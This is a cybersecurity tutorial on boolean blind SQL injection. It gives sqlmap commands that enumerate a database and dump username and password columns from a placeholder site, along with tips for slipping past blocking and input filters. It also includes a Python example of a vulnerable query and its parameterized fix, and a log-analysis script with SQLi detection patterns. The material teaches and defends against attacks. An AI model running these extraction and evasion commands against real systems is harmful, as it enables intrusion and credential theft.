Cyber Security

SQLi: Boolean Blind with sqlmap

TL;DR

This guide shows how to exploit a boolean blind SQL injection vulnerability using the sqlmap tool. We’ll cover identifying the vulnerability, setting up sqlmap for testing, and extracting data.

1. Understanding Boolean Blind SQL Injection

Boolean blind SQL injection happens when injected SQL is executed by the database, but the only feedback you get is a ‘true’ or ‘false’ signal – usually the page content changing or not depending on whether the injected condition held. No error message and no query data are returned directly, so every piece of information has to be recovered one yes/no question at a time. This makes it slower and harder to exploit than regular SQLi.
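To make the mechanism concrete, here is an added example (not code from the original post) contrasting the vulnerable pattern behind a boolean blind oracle with its parameterized replacement. It uses an in-memory SQLite table constructed for the demonstration; the table, column names and the lookup functions are assumptions. The vulnerable lookup hides database errors, as a real application in the blind scenario would, so the only observable signal is whether a row comes back.

```python
import sqlite3


def make_db():
    # Constructed sample table for the demonstration (not from the page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO page VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return conn


def lookup_vulnerable(conn, user_id):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so anything appended to it becomes part of the WHERE clause. Errors are
    # swallowed, which is exactly what makes the injection "blind".
    try:
        row = conn.execute(
            f"SELECT title FROM page WHERE id = {user_id}"
        ).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def lookup_safe(conn, user_id):
    # Hardened pattern: validate the type first, then bind the value as data.
    # The database never sees the parameter as SQL syntax.
    try:
        numeric_id = int(user_id)
    except ValueError:
        return None
    row = conn.execute(
        "SELECT title FROM page WHERE id = ?", (numeric_id,)
    ).fetchone()
    return row[0] if row else None


def has_boolean_oracle(conn, lookup):
    # A boolean oracle exists when a condition that is always true and one
    # that is always false produce observably different responses for the
    # same base value. The parameterized lookup gives the same answer to both.
    always_true = lookup(conn, "1 AND 1=1")
    always_false = lookup(conn, "1 AND 1=2")
    return always_true != always_false


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1 AND 1=1", "1 AND 1=2"):
        print(f"{probe!r:14} vulnerable={lookup_vulnerable(db, probe)!r:8} "
              f"safe={lookup_safe(db, probe)!r}")
    print("oracle (vulnerable):", has_boolean_oracle(db, lookup_vulnerable))
    print("oracle (safe):      ", has_boolean_oracle(db, lookup_safe))
```

The vulnerable lookup returns a row for the always-true probe and nothing for the always-false one, which is the single bit per request that a tool like sqlmap turns into full data extraction. The parameterized version answers both probes identically, so there is nothing to infer from; that is why prepared statements, not input filtering, are the fix.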

2. Identifying a Potential Vulnerability

Look for parameters in URLs that seem to affect database behaviour. Try adding a single quote (') to these parameters and see if the response changes. If it does, you might have an injection point. For example:

https://example.com/page?id=1

Try:

https://example.com/page?id=1'

If the page behaves differently, it suggests SQLi is possible.

3. Setting up sqlmap

  • Install sqlmap: Follow the instructions on the official sqlmap website for your operating system.
  • Basic Syntax: The core command is sqlmap -u <URL>. Replace <URL> with the target URL.

4. Running sqlmap

Let’s assume our vulnerable URL is https://example.com/page?id=1.

  1. Initial Scan: Start a basic scan to identify the injection point and database type:

    sqlmap -u "https://example.com/page?id=1" --dbs

    sqlmap will automatically try different payloads.

  2. Specifying the Injection Point (if needed): If sqlmap doesn’t detect the parameter, use -p <parameter>. For example:

    sqlmap -u "https://example.com/page?id=1" -p id --dbs

  3. Database Enumeration: The --dbs option lists the available databases.
  4. Table Enumeration: Once you know a database name (e.g., ‘users’), list its tables:

    sqlmap -u "https://example.com/page?id=1" -D users --tables

  5. Column Enumeration: To see the columns in a table (e.g., ‘accounts’):

    sqlmap -u "https://example.com/page?id=1" -D users -T accounts --columns

  6. Data Dumping: Finally, dump the data from specific columns:

    sqlmap -u "https://example.com/page?id=1" -D users -T accounts -C username,password --dump

5. Dealing with Boolean Blind Injection Specifically

  • Time-Based Blind SQLi: If the boolean blind injection is very slow, try time-based injection using --time-sec <seconds> and --delay <seconds>.
  • Random Agent: Use --random-agent to avoid being blocked by the server.
  • Tamper Scripts: sqlmap has tamper scripts that can help bypass filters. Explore them with --tamper <script_name> (e.g., --tamper space2comment).

6. Important Considerations

  • Legal: Only test on systems you have permission to assess.
  • Resource Intensive: Boolean blind SQLi can be slow and require many requests, since each request yields only one true/false answer. Be mindful of server load.
  • Error Handling: sqlmap provides detailed error messages – read them carefully!
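The same property that makes boolean blind extraction resource intensive (one bit per request, so hundreds of near-identical requests to one parameter) is what makes it visible in web server logs. As an added example, not part of the original post, the following script parses Apache combined-format access log lines constructed for the demonstration and flags a client that sends repeated SQL-looking values to the same parameter of the same path, while tolerating a single legitimate apostrophe in a search term. The log lines, the threshold and the User-Agent string are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (Apache combined format); not taken from the page.
# The scanner User-Agent is an approximation of the sqlmap default, not a
# verified string.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2024:13:55:37 +0000] "GET /page?id=1%27 HTTP/1.1" 200 4980 "-" "sqlmap/1.8 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2024:13:55:37 +0000] "GET /page?id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.8 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2024:13:55:38 +0000] "GET /page?id=1%20AND%201%3D2 HTTP/1.1" 200 4980 "-" "sqlmap/1.8 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2024:13:55:38 +0000] "GET /page?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 4980 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] "GET /page?id=2 HTTP/1.1" 200 5012 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2024:13:56:09 +0000] "GET /search?q=o%27reilly HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments that are rare in legitimate parameter values but common in SQLi
# probing. A lone quote or the word "or" can occur innocently, which is why
# alerts are raised on repetition rather than on a single request.
SQL_TOKENS = re.compile(
    r"(?i)('|\bAND\b|\bOR\b|\bUNION\b|\bSELECT\b|\bSLEEP\b|\bBENCHMARK\b|--|/\*)"
)


def parse_line(line):
    """Return a dict with ip, path, params and ua, or None if the line is not
    in combined format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl percent-decodes, so %27 becomes a literal quote before matching.
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def find_sqli_probing(log_text, threshold=3):
    """Count SQL-looking values per (client, path, parameter) and report the
    groups that reach the threshold, noting whether a scanner UA was seen."""
    hits = defaultdict(int)
    scanner_ua_seen = defaultdict(bool)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():
            scanner_ua_seen[(rec["ip"], rec["path"])] = True
        for name, value in rec["params"]:
            if SQL_TOKENS.search(value):
                hits[(rec["ip"], rec["path"], name)] += 1
    alerts = []
    for (ip, path, name), count in sorted(hits.items()):
        if count >= threshold:
            alerts.append({
                "ip": ip,
                "path": path,
                "param": name,
                "count": count,
                "scanner_ua": scanner_ua_seen[(ip, path)],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_sqli_probing(SAMPLE_LOG):
        print(alert)
```

With the default threshold the scanning client is reported once for the id parameter of /page, while the user who searched for an O'Reilly title is not. Lowering the threshold to 1 surfaces that apostrophe as a hit, which illustrates the trade-off: the signature alone is noisy, and the repetition across one parameter is what distinguishes an injection scan from ordinary traffic. The User-Agent check is a bonus signal only, since --random-agent (mentioned above) removes it.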